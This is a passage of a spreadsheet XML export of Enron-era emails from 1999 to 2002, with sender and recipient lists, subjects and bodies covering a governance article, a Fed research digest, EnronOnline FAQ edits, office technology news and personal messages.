ch has finally thrown in the towel and admitted it can't survive on its own=_x000D_
. Among slightly longer-running disasters, Lucent and Nortel have actually =_x000D_
destroyed far more shareholder wealth than Enron, and Xerox isn't far behin=_x000D_
d--but they've been pushed out of the headlines.=20_x000D_
What went wrong? These are all man-made disasters, and when you search for =_x000D_
the people to blame, you end up quickly at the board of directors. Somewher=_x000D_
e around the last recession (1990-91) it dawned on America's shareholders t=_x000D_
hat when something goes hugely wrong at a company, the buck stops at the bo=_x000D_
ard. Thus began a great campaign, still going strong, to improve corporate =_x000D_
governance. Its cause is noble, and it has won a lot of victories._x000D_
And yet the corporate-governance follies carry on with a surprising amount =_x000D_
of vim. To see just how much, stop by a terrific Website at www.thecorporat=_x000D_
elibrary.com. For our purposes you'll have to bypass the section that gives=_x000D_
 you the full text of the employment contracts of hundreds of major CEOs, t=_x000D_
hough I recommend that you check that out later. Right now we're concerned =_x000D_
with the state of America's boards, and so we arrive at the site's director=_x000D_
 screening tool, which answers all kinds of interesting questions about the=_x000D_
 directors of 1,500 companies.=20_x000D_
One of the major problems with directors of public companies is that they s=_x000D_
ometimes don't own much of the company's stock. Odds are strong they'd try =_x000D_
a lot harder if a significant amount of their own money were at stake. So I=_x000D_
 asked how many directors owned no stock at all in the companies they direc=_x000D_
ted. Answer: 963--and the director screening tool gives you all their names=_x000D_
. For example, did you know that Apple Computer CEO Steve Jobs owns no shar=_x000D_
es of Gap, though he's on the board?=20_x000D_
Another problem: too many inside directors. Virtually every board will incl=_x000D_
ude the CEO, which makes sense, and maybe the COO if that person is in line=_x000D_
</t>
  </si>
  <si>
    <t>Wed, 2 May 2001 07:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'frbnyrmag1@peach.ease.lsoft.com'})</t>
  </si>
  <si>
    <t>New FRBNY Research: 5/3</t>
  </si>
  <si>
    <t>Now available at the New York Fed's Research site: _x000D_
_x000D_
"Stocks in the Household Portfolio: A Look Back at the 1990s," by Tracy and _x000D_
Schneider (Current Issues 7, no. 4) _x000D_
http://www.newyorkfed.org/rmaghome/curr_iss/ci7-4.html _x000D_
_x000D_
"Currency Orders and Exchange-Rate Dynamics: Explaining the Success of _x000D_
Technical Analysis," by Osler (Staff Report 125) _x000D_
http://www.newyorkfed.org/rmaghome/staff_rp/2001/sr125.html _x000D_
_x000D_
"Recent Changes in the U.S. Business Cycle," by Chauvet and Potter (Staff _x000D_
Report 126) _x000D_
http://www.newyorkfed.org/rmaghome/staff_rp/2001/sr126.html _x000D_
_x000D_
U.S. and Global Economies Charts, updated every Wednesday _x000D_
http://www.newyorkfed.org/rmaghome/dirchrts/ _x000D_
_x000D_
In addition, the Foreign Exchange Committee's 2000 annual report is now _x000D_
available _x000D_
http://www.newyorkfed.org/FXC/ar2000/fxar00.html _x000D_
_x000D_
Research home page _x000D_
http://www.newyorkfed.org/rmaghome _x000D_
_x000D_
Feel free to forward these messages. To unsubscribe, contact _x000D_
listserv@peach.ease.lsoft.com. In the e-mail, type: signoff FRBNYRMAG1. For _x000D_
more details: http://www.newyorkfed.org/rmaghome/subscribe/subscribe.html. _x000D_
? _x000D_
_x000D_
This notification service is provided to you free of charge. By subscribing _x000D_
to the service and providing your e-mail address, you agree to waive any _x000D_
claim against the Federal Reserve Bank of New York for any messages that you _x000D_
may receive by reason of your subscription to this service and/or any _x000D_
resultant harm to you and/or your computer from receipt of such messages.? _x000D_
The Federal Reserve Bank of New York assumes no responsibility for any _x000D_
inaccuracies in any messages you may receive as a result of your subscription _x000D_
to this service.</t>
  </si>
  <si>
    <t>Wed, 3 Nov 1999 08:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: More FAQ's</t>
  </si>
  <si>
    <t xml:space="preserve">I'm afraid I'm still the right guy.  My comments below in red._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
David Forster_x000D_
11/03/99 09:05 AM_x000D_
To: Mark Taylor/HOU/ECT@ECT_x000D_
cc: Elena Kapralova/LON/ECT@ECT _x000D_
Subject: More FAQ's_x000D_
_x000D_
Mark,_x000D_
_x000D_
I'm not sure how you want to handle changes to the FAQ's going forward from a _x000D_
legal approval standpoint. Shall we continue to send you all new _x000D_
questions/answers?_x000D_
_x000D_
_x000D_
In addition to the FAQ's sent to you last week, we also have the following:_x000D_
_x000D_
1. Is EnronOnline wholesale only, or does it do retail?_x000D_
_x000D_
EnronOnline is not intended for available to retail customers sales at this _x000D_
point time._x000D_
_x000D_
2. What kind of technology does EnronOnline use behind the applications?_x000D_
_x000D_
The EnronOnline system uses various technologies to deliver the final product _x000D_
site to your screen. This includes an Oracle database, weblogic servers, _x000D_
Macromedia Shockwave, HTML, Java and Secure Socket Layer (SSL), among others._x000D_
_x000D_
3. What is the minimum size or price which can be transacted on EnronOnline?_x000D_
_x000D_
The minimum and maximum size is different for each product and is specified _x000D_
by the Enron trader who is responsible for that product.  It may vary from _x000D_
time to time.  There are no minimum price levels._x000D_
[It strikes me that there are minimum price levels (for sales by Enron) and _x000D_
maximum price levels (for purchases).]_x000D_
_x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Dave_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 22 Jun 2001 05:41:25 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'m..love@enron.com', 'kam.keiser@enron.com', 'david.baumbach@enron.com', 'errol.mclaughlin@enron.com', 'c..giron@enron.com'})</t>
  </si>
  <si>
    <t>FW: Final Deal List</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Gillis, Brian  _x000D_
Sent:	Friday, June 22, 2001 6:42 AM_x000D_
To:	Gossett, Jeffrey C._x000D_
Subject:	FW: Final Deal List_x000D_
_x000D_
I'll be sending you the effect by book as well._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Gillis, Brian  _x000D_
Sent:	Friday, June 22, 2001 5:39 AM_x000D_
To:	Clark, Morris; Whiting, Greg; Carrington, Clara; Su, Ellen; Scott, Laura_x000D_
Subject:	Final Deal List_x000D_
_x000D_
Here is the final deal list.  Per discussion with Laura, we made our final target 1.03 Bill USD, in order to leave the proper flexibility for accounting.  Final deal count is 458._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Sun, 11 Feb 2001 11:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Ina:_x000D_
Can you change my meeting with Sheriff's boys to Tueday after 3:00 from _x000D_
Monday._x000D_
Also, stick me on thedistribution for the Enron press pack that has all the _x000D_
articles in which Enron is mentioned._x000D_
Thanks</t>
  </si>
  <si>
    <t>Sun, 18 Nov 2001 17:56:21 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'technology.enron@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'mark.knippa@enron.com', 'milen.kurdov@enron.com', 'j..broderick@enron.com', 'diana.allen@enron.com', 'jay.reitmeyer@enron.com', 'frank.ermis@enron.com', 'craig.mack@enron.com', 'franky.sulistio@enron.com', 'harry.arora@enron.com', 'jeff.richter@enron.com', 'seung-taek.oh@enron.com', 'denver.plachy@enron.com', 'pete.heintzelman@enron.com', 'rick.wurlitzer@enron.com', 'christian.werner@enron.com', 'kelly.holman@enron.com', 'gustavo.giron@enron.com', 'kevin.ruscitti@enron.com', 'joseph.wagner@enron.com', 'f..brawner@enron.com', 'howard.marshall@enron.com', 'jeff.king@enron.com', 'david.woodstrom@enron.com', 'victoria.versen@enron.com', 'utku.gulmeden@enron.com', 'annette.willis@enron.com', 'geoff.storey@enron.com', 'virawan.yawapongsiri@enron.com', 'doug.gilbert-smith@enron.com', 'scott.goodell@enron.com', 'andrea.ring@enron.com', 'h..lewis@enron.com', 'tara.piazze@enron.com', 'jason.thompkins@enron.com', 'david.oxley@enron.com', 'david.michels@enron.com', 'russell.ballato@enron.com', 'd..thomas@enron.com', 'david.fairley@enron.com', 'andy.zipper@enron.com', 'christopher.barnum@enron.com', 'jennifer.martinez@enron.com', 's..pollan@enron.com', 'f..keavey@enron.com', 'barry.tycholiz@enron.com', 'bill.rust@enron.com', 'michael.salinas@enron.com', 'julia.sudduth@enron.com', 'larry.jester@enron.com', 'clinton.hurt@enron.com', 'hai.chen@enron.com', 'eric.bass@enron.com', 'kristin.walsh@enron.com', 'daniel.jenkins@enron.com', 'patrick.hanse@enron.com', 'andy.pace@enron.com', 'mauricio.marquez@enron.com', 'ramanarao.tamma@enron.com', 'bryan.hull@enron.com', 'steve.irvin@enron.com', 'kevin.cline@enron.com', 'elena.chilkina@enron.com', 'e..haedicke@enron.com', 'laura.luce@enron.com', 'michael.olsen@enron.com', 'jonathan.mckay@enron.com', 'shirley.tijerina@enron.com', 'todd.decook@enron.com', 'jeff.merola@enron.com', 'sherry.pendegraft@enron.com', 'rudy.acevedo@enron.com', 'david.forster@enron.com', 'steve.olinde@enron.com', 'laurel.bolt@enron.com', 'michele.raque@enron.com', 'junellen.neese@enron.com', 'clayton.vernon@enron.com', 'tammie.schoppe@enron.com', 'joe.stepenovitch@enron.com', 'r..shepperd@enron.com', 'loretta.brooks@enron.com', 'oscar.dalton@enron.com', 'christopher.pernoud@enron.com', 'fred.lagrasta@enron.com', 'preston.ochsner@enron.com', 'tina.rode@enron.com', 'linda.roberts@enron.com', 'adam.bayer@enron.com', 'chris.germany@enron.com', 'terrell.benke@enron.com', 'mark.smith@enron.com', 'lloyd.dickerson@enron.com', 'dayem.khandker@enron.com', 'nick.politis@enron.com', 'trading &lt;.williams@enron.com&gt;', 'castlen.moore@enron.com', 'jason.huang@enron.com', 'stephanie.miller@enron.com', 'wes.colwell@enron.com', 'michele.wilks@enron.com', 'neithard.foley@enron.com', 'jeffrey.miller@enron.com', 'michael.yosowitz@enron.com', 'k..allen@enron.com', 'scott.neal@enron.com', 'colleen.sullivan@enron.com', 'lisa.hesse@enron.com', 'vladi.pimenov@enron.com', 'steve.gim@enron.com', 'andrew.greer@enron.com', 'janette.elbertson@enron.com', 'lorie.belsha@enron.com', 'james.simpson@enron.com', 'jared.kaiser@enron.com', 'dipak.agarwalla@enron.com', 'joe.errigo@enron.com', 'lucy.ortiz@enron.com', 'reagan.mathews@enron.com', 'george.phillips@enron.com', 'william.freije@enron.com', 'cory.willis@enron.com', 'robert.mattice@enron.com', 'c..giron@enron.com', 'eric.saibi@enron.com', 'agustin.perez@enron.com', 'kim.alexander@enron.com', "justin.o'malley@enron.com", 'rahil.jafry@enron.com', 'ruth.concannon@enron.com', 'gary.bryan@enron.com', 'mark.jackson@enron.com', 'louise.kitchen@enron.com', 'gerald.gilbert@enron.com', 'tina.holcombe@enron.com', 'steve.pan@enron.com', 'anubhav.aggarwal@enron.com', 'claudette.harvey@enron.com', 'david.ryan@enron.com', 'clint.dean@enron.com', 'don.baughman@enron.com', 'punit.rawal@enron.com', 'david.jones@enron.com', 'john.arnold@enron.com', 'mara.bronstein@enron.com', 'jae.black@enron.com', 'houston &lt;.ward@enron.com&gt;', 'kimberly.hardy@enron.com', 'kimberly.hillis@enron.com', 'rika.imai@enron.com', 'lauren.schlesinger@enron.com', 'robin.barbe@enron.com', 'jerome.buss@enron.com', 'sheetal.patel@enron.com', 'd..baughman@enron.com', 'andrew.bermack@enron.com', 'mike.carson@enron.com', 'moises.benchluch@enron.com', 'sheila.chang@enron.com', 'robert.stalford@enron.com', 'bryce.schneider@enron.com', 'scott.franklin@enron.com', 'david.baumbach@enron.com', 'sarah.wooddy@enron.com', 'lloyd.will@enron.com', 'l..kelly@enron.com', 'larry.valderrama@enron.com', 'larry.may@enron.com', 'lindon.chiu@enron.com', 'matt.lorenz@enron.com', 'david.maskell@enron.com', 'jason.wolfe@enron.com', 'mark.symms@enron.com', 'maureen.smith@enron.com', 'thomas.lowell@enron.com', 'chris.gaskill@enron.com', 'charles.weldon@enron.com', 'lisa.burnett@enron.com', 'jim.schwieger@enron.com', 'rogers.herndon@enron.com', 'judy.townsend@enron.com', 'iris.mack@enron.com', 'jacob.shupe@enron.com', 'paulita.olvera@enron.com', 'l..day@enron.com', 'brad.mckay@enron.com', 'dutch.quigley@enron.com', 'justin.rostant@enron.com', 'kathy.bass@enron.com', 'amy.fitzpatrick@enron.com', 'cora.pendergrass@enron.com', 'dean.laurent@enron.com', 'anna.santucci@enron.com', 'anthony.dayao@enron.com', 'david.ingram@enron.com', 'ina.rangel@enron.com', 'alex.villarreal@enron.com', 'amanda.day@enron.com', 'p..hewitt@enron.com', 'rachel.bryant@enron.com', 'j..sturm@enron.com', 'claudia.guerra@enron.com', 'kristann.shireman@enron.com', 'maria.valdes@enron.com', 'm..tholt@enron.com', 'richard.ring@enron.com', 'lisa.shoemake@enron.com', 'frank.vickers@enron.com', 'w..pereira@enron.com', 'p..south@enron.com', 'terri.clynes@enron.com', 'heather.kroll@enron.com', 'b..fleming@enron.com', 'john.griffith@enron.com', 'craig.breslau@enron.com', 'suzette.emmons@enron.com', 'mike.grigsby@enron.com', 'martin.cuilla@enron.com', 'william.smith@enron.com', 'robert.vargas@enron.com', 'john.kinser@enron.com', 'john.suarez@enron.com', 'dana.davis@enron.com', 'h..otto@enron.com', 'carl.tricoli@enron.com', 'corry.bentley@enron.com', 'tetteh.canacoo@enron.com', 'keith.holst@enron.com', 'daniel.quezada@enron.com', 'don.black@enron.com', 'paul.schiavone@enron.com', 'juan.padron@enron.com', 'ress.young@enron.com', 'frank.hayden@enron.com', 'ashish.mahajan@enron.com', 'jason.choate@enron.com', 'adam.stevens@enron.com', 'tom.may@enron.com', 'l..mims@enron.com', 's..shively@enron.com', 'bart.burk@enron.com', 'madhup.kumar@enron.com', 'david.ratliff@enron.com', 'l..garcia@enron.com', 'laura.vuittonet@enron.com', 'michael.seely@enron.com', 'n..gilbert@enron.com', 'monica.hwang@enron.com', 'jozef.lieskovsky@enron.com', 'mike.maggi@enron.com', 'reagan.rorschach@enron.com', 'jaime.gualy@enron.com', 'brian.falik@enron.com', 'e.murrell@enron.com', 'neeran.pathak@enron.com', 'tori.kuykendall@enron.com', 'narsimha.misra@enron.com', 'clifton.brundrett@enron.com', 'jeanie.slone@enron.com', 'leonidas.savvas@enron.com', 'tom.donohoe@enron.com', 'ryan.williams@enron.com', 'sanjay.hemani@enron.com', 'carrie.larkworthy@enron.com', 'iz.wong@enron.com', 'palmer.letzerich@enron.com', 'debra.bailey@enron.com', 'jessica.presas@enron.com', 'sarah.hotze@enron.com', 'john.lavorato@enron.com', 'morris.larubbio@enron.com', 'john.hodge@enron.com', 'phil.polsky@enron.com', 'souad.mahmassani@enron.com', 'matt.smith@enron.com', 'd..hogan@enron.com', 'chris.hyde@enron.com', 'matthew.duffy@enron.com', 'hicham.benjelloun@enron.com', 'christa.winfrey@enron.com', 'julie.clyatt@enron.com', 'andrew.migliano@enron.com', 'matthew.lenhart@enron.com', 'james.grace@enron.com', 'chuck.ames@enron.com', 'david.draper@enron.com', 'robert.benson@enron.com', 'brian.redmond@enron.com', 'nelson.ferries@enron.com', 'alexander.mcelreath@enron.com', 'houston &lt;.smith@enron.com&gt;', 'd..anderson@enron.com', 'mike.zipperer@enron.com', 'steven.luong@enron.com', 'g.kelly@enron.com', 'joe.capasso@enron.com', 'amy.schuster@enron.com', 'troy.denetsosie@enron.com', 'david.dronet@enron.com', 'benjamin.rogers@enron.com', 'steve.wang@enron.com', 'eric.irani@enron.com', 'john.morris@enron.com', 'jeb.ligums@enron.com', 'barry.vanderhorst@enron.com', 'matthew.titus@enron.com', 'kim.wood@enron.com', 'tonezone &lt;.willis@enron.com&gt;', 'willis.philip@enron.com', 'catalina.cardenas@enron.com', 'maximilian.sell@enron.com', 'patrick.tucker@enron.com', 'jose.marquez@enron.com', 'jason.kaniss@enron.com', 'kimberly.bates@enron.com', 'ted.ballinger@enron.com', 'a..martin@enron.com', 'r..barker@enron.com', 'mike.curry@enron.com', 'david.duran@enron.com', 'shauywn.smith@enron.com', 'guy.sharfman@enron.com', 'a..roberts@enron.com', 'jennifer.shipos@enron.com', 'laura.podurgiel@enron.com', 'aaron.berutti@enron.com', 'joseph.des@enron.com', 'gautam.gupta@enron.com', 'gerald.emesih@enron.com', 'chris.figueroa@enron.com', 'brian.terp@enron.com', 'jay.blaine@enron.com', 'jeremy.lo@enron.com', 'g..moore@enron.com', 'gretchen.lotz@enron.com', 'craig.taylor@enron.com', 'stephen.bennett@enron.com', 'joe.parks@enron.com', 'dustin.collins@enron.com', 'shalesh.ganjoo@enron.com', 'm..scott@enron.com', 'peter.makkai@enron.com', 'l..gay@enron.com', 'jason.panos@enron.com', 'bryant.frihart@enron.com', 'jesus.guerra@enron.com', 'cynthia.franklin@enron.com', 'gil.muhl@enron.com', 'christie.manck@enron.com', 'bilal.bajwa@enron.com'})</t>
  </si>
  <si>
    <t>Enron Center South Technology Watch</t>
  </si>
  <si>
    <t>Welcome to Enron Center South. As you have probably already noticed, things look a little different here. We wanted to orientate you to your new environment and inform you about the future technology coming on-line in the coming weeks. _x000D_
_x000D_
Occupancy Guidebook To Enron Center South_x000D_
You will find this handy guide on your desk; it contains information concerning the enhanced printer environment, the new easy access keyboards and telephony procedures._x000D_
_x000D_
NEC Monitors_x000D_
The NEC monitors have an internal anti-glare screen to help reduce eye strain and eliminate the need to install an additional screen cover.  Additionally, an integrated speaker has been installed on one monitor for each desk._x000D_
_x000D_
Turret Users_x000D_
An "Alliance MX turret quick reference guide" has been placed on your desk; this includes important information about the new features such as "Caller ID" and "Voicemail Indication"._x000D_
_x000D_
Increased Information Access_x000D_
There are many NEC 50" Plasma screens installed on the 5th and 6th floors.  While many of these will be displaying information designed for the specific unit, others will be displaying various television channels.  The audio to these television channels can be accessed via any of your telephony equipment.  Here's how:_x000D_
_x000D_
Ten audio channels have been set up for access from your either your Avaya telephone, Stentophon, or IPC Turret.  The channels have been defined on Page 15 of your Turret.  To access the audio from either your Avaya or Stentophon, simply dial the extensions shown in the table below:_x000D_
 _x000D_
Channel	Avaya	Stentophon	_x000D_
Weather Channel	12401	801	_x000D_
CNN Headlines News	12402	802	_x000D_
CNN Financial News	12403	803	_x000D_
CNBC	12404	804	_x000D_
MSNBC	12405	805	_x000D_
Bloomberg	12406	806	_x000D_
Financial News Network	12407	807	_x000D_
CNN	12408	808	_x000D_
Fox Sports	12409	809	_x000D_
ESPN1	12410	810	_x000D_
_x000D_
_x000D_
Wireless Telephony_x000D_
You may notice the cellular phone coverage is not consistent across the floor, and some areas have virtually no coverage at all.  We are implementing a multi-network "in-building" system to provide consistent high quality service for the campus, keeping you in touch while you are on the move.  _x000D_
_x000D_
Wireless LAN_x000D_
The infrastructure to support Wireless LAN technology is in place and is being tested. We will be implementing multi level encryption and security to keep our intellectual property safe from eavesdroppers or hackers._x000D_
_x000D_
Amtel Replacement_x000D_
As a move to provide a more flexible "Plug n Play" environment and to help with the reduced desk footprint, we have replaced the Amtel message boxes with Microsoft Exchange Instant Messaging. The Global Messaging Team is testing additional software products to provide some of the features not available with Exchange Instant Messaging; these include one-touch response keys, external LED display, and printing.  Updates will be provided as they become available._x000D_
_x000D_
Keeping an Open forum_x000D_
We will keep you informed of the changes and developments as the migration to the building continues, please feel free to respond with any comments, queries or suggestions to  mailto:Enron.Center.South.Technology@enron.com</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 03:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'richard.ingersoll@enron.com'})</t>
  </si>
  <si>
    <t>Re:WIO/WSCC</t>
  </si>
  <si>
    <t>At a WSCC Board meeting today I reinforced our concerns about the WIO Board _x000D_
citing the following.    1  Stake holder Board members vs independent     2  _x000D_
The structure that includes two transmissin provider groups.</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 09:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dfranklin@hanovermeasurement.com', 'eric.bass@enron.com', 'shanna.husser@enron.com', 'jason.bass2@compaq.com'})</t>
  </si>
  <si>
    <t>the tree</t>
  </si>
  <si>
    <t>Hi Guys. We intend to decorated the home and tree this Sunday, if you guys_x000D_
can join us. Here is the deal. We will order Chinese food from Fungs Kitchen_x000D_
on the SW freeway, Shanna and Eric can pick it up, I will pay, everyone   be_x000D_
here early p.m., eat around 4-5, put the decorations up, have a good time._x000D_
Any takers? Let me hear from you.-Dad</t>
  </si>
  <si>
    <t>Mon, 11 Jun 2001 08:24:48 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'randy.otto@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'michael.taylor@enron.com', 'mike.cowan@enron.com', 'grant.oh@enron.com', 'lon.draper@enron.com', 'chad.clark@enron.com', 'peggy.hedstrom@enron.com', 'cindy.feldman@enron.com', 'wendy.conwell@enron.com', 'eric.le@enron.com', 'ryan.watt@enron.com', 'phil.demoes@enron.com', 'randy.otto@enron.com', 'brian.gillis@enron.com', 'tanya.rohauer@enron.com', 'cyntia.di@enron.com', 'matilda.machado@enron.com', 'howard.sangwine@enron.com', 'peter.keohane@enron.com', 'jason.biever@enron.com', 'russell.diamond@enron.com', 'gerry.hrap@enron.com', 'chris.wiebe@enron.com', 'nicole.laporte@enron.com', 'dean.drozdiak@enron.com', 'jeff.borg@enron.com', 'dianne.seib@enron.com', 'jeff.pearson@enron.com', 'edward.sacks@enron.com', 'kyle.kitagawa@enron.com', 'jonathan.mckay@enron.com', 'murray.fichten@enron.com', 'john.disturnal@enron.com', 'chris.gaffney@enron.com', 'greg.johnston@enron.com', 'mark.kathy@enron.com', 'jan.wilson@enron.com', 'chris.lambie@enron.com', 'veronica.espinoza@enron.com', 's..bradford@enron.com', 'cooper.richey@enron.com', 'rudwell.johnson@enron.com', 'john.zufferli@enron.com', 'paul.devries@enron.com', 'paul.radous@enron.com', 'tyler.seminuk@enron.com', 'rob.milnthorp@enron.com', 'credit &lt;.williams@enron.com&gt;', 'derek.davies@enron.com'})</t>
  </si>
  <si>
    <t>Canada Credit Watch List 6/11/01</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a newly revised Credit Watch listing for the week of 6/11/01.   _x000D_
If there are any personnel in your group that were not included in this distribution and would like to be added OR if you do not want to be on the list for future distributions, please send me an e-mail request._x000D_
_x000D_
For other questions, please contact Russell Diamond at 713-345-7095 or myself at 713-345-8261_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 22:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ksiles@hotmail.com'})</t>
  </si>
  <si>
    <t>Re: chick, oh I mean ski trip update</t>
  </si>
  <si>
    <t>My response is that you need to call me tonight because email sucks.</t>
  </si>
  <si>
    <t>Fri, 3 May 2002 10:18:49 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'erwollam@hotmail.com'})</t>
  </si>
  <si>
    <t>RE: Man Night Report</t>
  </si>
  <si>
    <t>Excellent. I'm sure the motorists trailing behind the pig mobile enjoyed the _x000D_
beer cans, bottle tops and copenhagen cans bouncing off their windshields._x000D_
_x000D_
_x000D_
&gt;From: "Brian Constantine" &lt;brianc@saltgrass.com&gt;_x000D_
&gt;To: "Erik Wollam" &lt;erwollam@hotmail.com&gt;, &lt;knipe3@msn.com&gt;, _x000D_
&gt;&lt;chet_fenner@bmc.com&gt;, &lt;bcorrier@cox-internet.com&gt;, &lt;joe.parks@enron.com&gt;_x000D_
&gt;Subject: RE: Man Night Report_x000D_
&gt;Date: Fri, 3 May 2002 11:44:27 -0500_x000D_
&gt;_x000D_
&gt;I think Chad imbibed a copious amount of "contaminated well water" last _x000D_
&gt;night...at least he sounds like it!!!_x000D_
&gt;_x000D_
&gt;FYI...I spent the majority of my drive home on the phone with Chad, _x000D_
&gt;complaining that someone had stolen my tailgate!!! I couldn't see it in my _x000D_
&gt;rear view mirror....in actuality; it was just "down"._x000D_
&gt;_x000D_
&gt;"Fat, drunk, and stupid is no way to go through life, son."_x000D_
&gt;						- Dean Wermer, Animal House_x000D_
&gt;_x000D_
&gt;-----Original Message-----_x000D_
&gt;From: Erik Wollam [mailto:erwollam@hotmail.com]_x000D_
&gt;Sent: Friday, May 03, 2002 11:09 AM_x000D_
&gt;To: knipe3@msn.com; chet_fenner@bmc.com; bcorrier@cox-internet.com; _x000D_
&gt;joe.parks@enron.com; Brian Constantine_x000D_
&gt;Subject: Re: Man Night Report_x000D_
&gt;_x000D_
&gt;Sorry I was not there. Would have rather been there than at the El Campo_x000D_
&gt;Civic Center talking to upset people about their contaminated well water._x000D_
&gt;_x000D_
&gt;_x000D_
&gt; &gt;From: "chad knipe" &lt;knipe3@msn.com&gt;_x000D_
&gt; &gt;To: "Chet Fenner" &lt;chet_fenner@bmc.com&gt;, "Brad Corrier"_x000D_
&gt; &gt;&lt;bcorrier@cox-internet.com&gt;, "Joe Parks" &lt;joe.parks@enron.com&gt;, "EriK_x000D_
&gt; &gt;Wollam" &lt;erwollam@hotmail.com&gt;, "Brian Constantine" _x000D_
&gt;&lt;brianc@saltgrass.com&gt;_x000D_
&gt; &gt;Subject: Man Night Report_x000D_
&gt; &gt;Date: Fri, 3 May 2002 07:49:56 -0500_x000D_
&gt; &gt;_x000D_
&gt; &gt;Attendees: me,pig,zander and small zander.  Ate a lot of crustaceous _x000D_
&gt;bugs,_x000D_
&gt; &gt;drank a lot, spent money on raffle tickets because the chick selling them_x000D_
&gt; &gt;was hot, won nothing, drank more, woke up on couch,_x000D_
&gt; &gt;.............I feel horrible._x000D_
&gt; &gt;Overall a success despite attendance. Ready to go again._x000D_
&gt; &gt;_x000D_
&gt; &gt;C._x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;__________________________________________________________________x000D_
&gt;Join the world's largest e-mail service with MSN Hotmail._x000D_
&gt;http://www.hotmail.com_x000D_
&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
__________________________________________________________________x000D_
Join the world's largest e-mail service with MSN Hotmail. _x000D_
http://www.hotmail.com</t>
  </si>
  <si>
    <t>Thu, 26 Apr 2001 01:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dottie@kerr-solutions.com'})</t>
  </si>
  <si>
    <t>Re: HBS May 7 Luncheon - Eugene Vaughan</t>
  </si>
  <si>
    <t xml:space="preserve">Thank you for the invitation.  Unfortunately, Jeff Skilling is unable to=20_x000D_
attend.=20_x000D_
_x000D_
Joannie Williamson_x000D_
713-345-7774_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Dottie Kerr &lt;dottie@kerr-solutions.com&gt; on 04/25/2001 11:37:57 PM_x000D_
To: (Recipient list suppressed)_x000D_
cc: =20_x000D_
_x000D_
Subject: HBS May 7 Luncheon - Eugene Vaughan_x000D_
_x000D_
_x000D_
As President of the Harvard Business School Club of Houston, I along with_x000D_
the Club=01,s Officers and Directors, strive to host a cross-section of_x000D_
interesting topics by provocative speakers.  Our May 7 speaker, an HBS alum_x000D_
and successful Houston businessman, will highlight the results of a_x000D_
scenario-planning project conducted by some of the most prominent Houston_x000D_
business leaders._x000D_
_x000D_
TOPIC:         Seizing the Future for Houston_x000D_
_x000D_
SPEAKER:   Mr. Eugene Vaughan, Chairman, Center for Houston=01,s Future_x000D_
                    Chairman and Founder, Vaughan, Nelson, Scarborough &amp;_x000D_
McCullough, L.P._x000D_
_x000D_
DATE:          Monday, May 7, 2001_x000D_
PLACE:        Houston Club, 811 Rusk in downtown Houston_x000D_
TIME:           11:40 a.m. Check in, 11:55 p.m. Lunch, 12:15 p.m. Presentat=_x000D_
ion_x000D_
_x000D_
COST:          Sustaining Members: No charge_x000D_
                    $20 for Regular Members with reservations_x000D_
                    $25 for Members without reservations and Guests_x000D_
                    NO-SHOWS WILL BE BILLED_x000D_
_x000D_
RSVP:          By noon on May 4, 2001_x000D_
_x000D_
The Board of the Center for Houston=01,s Future recently committed_x000D_
resoundingly to the creation of Goals and a Strategic Plan for Houston that_x000D_
will allow our community to achieve its extraordinary potential over the_x000D_
next decisive 20 years.  This landmark program, already underway, will be_x000D_
assisted by many dedicated volunteers from throughout the community.  Led_x000D_
by Chairman Gene Vaughan, the Center, an affiliate of the Greater Houston_x000D_
Partnership, is focused on very tough questions:  The world and Houston are_x000D_
changing rapidly - what will be the new reality in 20 years and beyond?_x000D_
What do we want Houston to be?  What are the obstacles and trade-offs?_x000D_
Most of all, what plans, resources, determination and leadership are_x000D_
necessary now to get Houston to its desirable future?  If you are_x000D_
interested in what can be done to give Houston a great future worthy of its_x000D_
past - and particularly if you want to get involved - this is an_x000D_
outstanding opportunity to discourse with one of the citizens leading the_x000D_
charge._x000D_
_x000D_
Gene Vaughan is chairman and founder of Vaughan, Nelson, Scarborough &amp;_x000D_
McCullough, L.P., an investment management firm originated in Houston in_x000D_
1970 whose Investment Counsel and VNSM Trust Company manage securities_x000D_
portfolios for foundations, endowments, corporations and families._x000D_
_x000D_
Within his profession, Mr. Vaughan was founding chairman and governor of_x000D_
the Association for Investment Management and Research, a past chairman of_x000D_
the Institute of Chartered Financial Analysts and a past chairman of the_x000D_
Financial Analysts Federation.  He is chairman and has served as a director_x000D_
since 1970 of Dreyfus Founders Group of mutual funds (Denver)._x000D_
_x000D_
Mr. Vaughan has been a trustee of Vanderbilt University (Nashville) since_x000D_
1972.  He is a director since 1990 and on the Executive Committee of the_x000D_
Greater Houston Partnership.  He is Chairman of the Center for Houston=01,s_x000D_
Future whose mission is to help prepare Houston proactively for future_x000D_
opportunities and challenges.  Mr. Vaughan is a director of the Houston_x000D_
Grand Opera Association, a trustee of Goodwill Industries and past chairman_x000D_
of The Houston Forum.  He was founding chairman of Presbyterian School_x000D_
(early childhood through grade 8) and served as a trustee of St. John=01,s=_x000D_
=20_x000D_
School._x000D_
_x000D_
